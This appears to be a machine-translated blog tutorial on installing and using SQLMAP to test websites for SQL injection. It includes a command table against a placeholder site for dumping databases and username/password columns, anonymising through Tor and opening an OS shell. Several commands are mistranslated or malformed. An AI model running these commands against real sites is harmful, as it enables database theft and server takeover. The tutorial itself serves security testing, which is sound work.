Homehow ToSQLMAP: How to test your site for SQL vulnerabilities

SQLMAP: How to test your site for SQL vulnerabilities

In his space ethical hacking, SQLMAP is the predominant tool for finding vulnerabilities based on SQL injection. It is an open source solution written in python language that automates the process of finding and exploiting SQL vulnerabilities with the ultimate goal of fully controlling the database and server in which he is.


It includes several functions such as database fingerprinting, data collection and command line execution. Operating Systems. The SQLMAP tool can be used for the following purposes:

  • Checking a web application for a SQL injection vulnerability
  • Exploiting SQL injection vulnerability
  • Extract data from the database and its users
  • Override the Web Application Firewall (WAF)
  • Full control of the base operating system

Some of the most important features of SQLMAP are shown below:

  • It can support MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase technologies.
  • It also supports 6 different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
  • Supports finding hashed passwords using dictionary attack technique.
  • Allows crawling of users, hashed passwords, roles, permissions, bases, tables and columns.

What is SQL injection?

SQL injection is a hacking technique where the attacker, by modifying it URL or some other character input field of the web application can insert SQL commands directly into the database. This results in overriding application security techniques and as a result the attacker can extract data from the entire database, modify it and even delete it.

It is one of the oldest and most dangerous attacks on web applications. OWASP (Open Web Application Security Project) ranks injection threats at number one on the list of Top 10 Web Application Security Threats (OWASP Top 10).

How to use it

SQLMAP is available for operating systems Windows, Linux and Mac. You will find it pre-installed on Linux distro for penetration testing, Kali Linux.


The first step you should take is to download (if you don't already have it) the python interpreter - remember that the tool is written in python. You can download the latest version from here. (v 3.8.0).

After you have successfully completed the python installation, follow these steps:

  1. Download it zip file by website of SQLMAP.
  2. Unzip the folder and its contents to the desired location
  3. Open a cmd console and navigate to the location where you unzipped the folder from the previous step.
  4. Run the sqlmap.py command…. And see all your options.
  5. Are you ready

sqlmap SQL


In almost all Linux distros Python is installed by default. If you're not sure, open a terminal and type python –version. If python is installed the above command will show you the version.


Then run the following commands to complete the installation of the tool:

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-devpython sqlmap.py

The last command will display on our screen something like the following:


How to use it

Here are some basic commands you can use with SQLMAP and their description:

Mandate Description
sqlmap -u “http://site.com/login.php” Simple check for a specific URL
sqlmap -u “http://site.com/login.php” –tor –tor-type = SOCKS5 'Check using tor
sqlmap -u "http://site.com/login.php" -time-sec 20 Control by setting the time limit
sqlmap -u “http://site.com/login.php” –dbs Option to return all databases of a web application
sqlmap -u “http://site.com/login.php” -D site_db –tables Returning the contents of a specific database
sqlmap -u “http://site.com/login.php” -D site_db -T users –dump Return the contents of a particular table
sqlmap -u “http://site.com/login.php” -D site_db -T users –columns Return all columns in a table
sqlmap -u “http://site.com/login.php” -D site_db -T users -C username, password –dump Return specific column content
sqlmap -u “http://site.com/login.php” –method “POST” –data “username = admin & password = admin & submit = Submit” -D social_mccodes -T users –dump Return table when we have admin login information
sqlmap –dbms = mysql -u “http://site.com/login.php” –os-shell Return to OS Shell
sqlmap –dbms = mysql -u “http://site.com/login.php” –sql-shell SQL Shell Return

You can find a more detailed cheetseat for SQLMAP here..

We look forward to your comments ...

Here's the crazy ones, the misfits, the rebels, the troublemakers ...